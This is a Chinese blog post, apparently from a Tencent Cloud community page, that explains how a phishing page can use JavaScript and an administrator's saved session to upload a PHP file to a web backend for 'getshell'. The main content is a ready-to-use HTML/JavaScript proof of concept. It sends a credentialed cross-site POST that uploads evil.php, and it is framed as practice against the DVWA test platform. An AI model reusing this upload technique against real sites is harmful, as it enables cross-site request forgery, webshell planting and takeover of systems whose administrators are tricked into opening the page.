利用JavaScript进行后台文件上传getshell

看到一些XSS+CSRF上传的漏洞,这次就学习了一下HTML5的一些新特性,用JavaScript实现了文件上传。攻击者可以向管理员发送一个钓鱼页面,管理员只要打开了这个页面,并且当前浏览器保存了后台的会话信息,那么就有可能实现getshell。 1.1 软件环境 Chrome浏览器 DVWA-1.9漏洞测试平台 wamp3.0集成环境

1.2 host文件与虚拟目录配置 修改host文件,添加dvwa.me与hey.me指向本机 设置dvwa.me虚拟主机指向WEB_ROOT/dvwa 设置hey.me虚拟主机指向WEB_ROOT

二、利用详解

<html>
<head>
    <title>黑白网漏洞测试</title>
</head>
<body>
    <form id="myForm" method="POST" name="myForm" action="ajax.php">
    <button id="submit_btn" type="button">Upload</button>
    </form>
    <script type="text/javascript">
        function btnClick(){
            document.getElementById("submit_btn").onclick=function(){
                var xmlhttp = new XMLHttpRequest();
                xmlhttp.withCredentials = true;
                var url = "http://www.heibai.org";
                var formdata = new FormData();
                var filedata = new Blob(['This is evil txt'], {type: 'image/jpeg'});
                formdata.append("Upload","Upload");
                formdata.append("uploaded",filedata,"evil.php");
                xmlhttp.onreadystatechange=function(){
                    if (xmlhttp.readyState==4 && xmlhttp.status==200){
                        console.log(xmlhttp.responseText);
                    }
                }
                xmlhttp.open("POST",url,true);
                xmlhttp.send(formdata);
            }
        }
        btnClick();
    </script>
</body>
 
</html>

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏coder修行路

Go实现海量日志收集系统(四)

45720
来自专栏梦魇小栈

JQuery分析及实现part7之 Ajax 模块功能及实现

11820
来自专栏Java技术分享

基于Metronic的Bootstrap开发框架经验总结(5)--Bootstrap文件上传插件File Input的使用

Bootstrap文件上传插件File Input是一个不错的文件上传控件,但是搜索使用到的案例不多,使用的时候,也是一步一个脚印一样摸着石头过河,这个控件在界...

43390
来自专栏码生

实现更安全、高扩展的自定义键盘 非UIButton

自定义键盘的封装网上的例子比比皆是,有的封装的非常完美,直接pod 集成到项目中便可以简单的使用,可是为什么我还要自定义一个呢? 一不是不是为了显摆,二不是网...

13220
来自专栏王大锤

升级xcode7.0 第三方库不能用的解决方法(bitcode是什么鬼?)

31670
来自专栏程序员的碎碎念

异步的JavaScript和XML(AJAX)

什么是 AJAX ? AJAX = 异步 JavaScript 和 XML。 AJAX 是一种用于创建快速动态网页的技术,不是新的编程语言,而是一种使用现有标准...

40540
来自专栏科技前线

升级Bash修复Shellshock漏洞

Shellshock,又称Bashdoor,是一个安全漏洞,于2014年9月12日被发现,直到9月24日被赋予了CVE编号CVE-2014-6271才得以控制。...

19920
来自专栏黑泽君的专栏

ajax学习小结

10210
来自专栏岑志军的专栏

(7)theos安装

21640
来自专栏静默虚空的博客

Webpack 资源管理

资源管理 ? 提示: 1、版本问题 本文基于 webpack 2.x 版本。webpack 2.x 相比 webpack 1.x 有重大改变。所以,如果你的...

23170

扫码关注云+社区

领取腾讯云代金券